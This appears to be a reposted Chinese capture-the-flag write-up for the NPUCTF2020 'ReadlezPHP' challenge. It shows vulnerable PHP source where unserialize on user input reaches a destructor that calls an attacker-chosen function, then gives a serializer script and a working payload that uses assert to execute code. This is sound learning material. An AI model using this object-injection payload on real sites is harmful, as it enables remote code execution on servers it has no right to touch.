标签：__ function public 源码 HelloPhp NPUCTF2020 echo ReadlezPHP

[NPUCTF2020]ReadlezPHP

1.先查看源码，得到地址

2.

2.得到一个源码，一看应该就是反序列化题

 <?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);   这里可以利用一下，也就是说如果将$b赋值为函数，$a赋值为命令，就能执行我们想执行的命令。
    }
}
$c = new HelloPhp;

if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}
这段是显示源码用的
@$ppp = unserialize($_GET["data"]);

<?php
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "phpinfo();";
        $this->b = "assert";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp();
echo serialize($c);
?>

（刚开始我是用的system，而不是assert，但是一直没有回显，就百度了下大佬的wp，发现system被过滤了）

payload:   ?data=O:8:"HelloPhp":2:{s:1:"a";s:10:"phpinfo();";s:1:"b";s:6:"assert";}

然后再搜索一下flag信息就能得到flag

标签：__,function,public,源码,HelloPhp,NPUCTF2020,echo,ReadlezPHP
来源： https://www.cnblogs.com/l0vehzzz/p/16417326.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。